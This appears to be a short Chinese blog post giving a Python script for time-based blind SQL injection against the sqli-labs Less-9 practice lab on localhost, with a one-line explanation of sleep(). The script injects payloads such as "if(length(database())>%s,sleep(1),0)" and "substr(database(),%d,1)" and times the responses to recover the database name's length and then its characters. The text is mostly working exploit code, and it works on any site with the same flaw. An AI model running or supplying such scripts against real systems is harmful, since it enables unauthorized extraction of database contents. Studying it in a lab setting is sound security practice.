基于时间的sql盲注入python脚本
1 # coding:utf-8 2 import requests 3 import datetime 4 import time 5 6 # 获取数据库名长度 7 8 9 def database_len(): 10 for i in range(1, 10): 11 url = '''http://127.0.0.1/sqli-labs/Less-9/index.php''' 12 payload = '''?id=1' and if(length(database())>%s,sleep(1),0)''' % i 13 # print(url+payload+'%23') 14 time1 = datetime.datetime.now() 15 r = requests.get(url + payload + '%23') 16 time2 = datetime.datetime.now() 17 sec = (time2 - time1).seconds 18 if sec >= 1: 19 print(i) 20 else: 21 print(i) 22 break 23 print('database_len:', i) 24 25 26 database_len() 27 28 29 #获取数据库名 30 def database_name(): 31 name = '' 32 for j in range(1, 9): 33 for i in '0123456789abcdefghijklmnopqrstuvwxyz': 34 url = '''http://127.0.0.1/sqli-labs/Less-9/index.php''' 35 payload = '''?id=1' and if(substr(database(),%d,1)='%s',sleep(1),1)''' % ( 36 j, i) 37 # print(url+payload+'%23') 38 time1 = datetime.datetime.now() 39 r = requests.get(url + payload + '%23') 40 time2 = datetime.datetime.now() 41 sec = (time2 - time1).seconds 42 if sec >= 1: 43 name += i 44 print(name) 45 break 46 print('database_name:', name) 47 48 49 database_name()
sleep(s)使sql语句的执行暂停s秒钟。
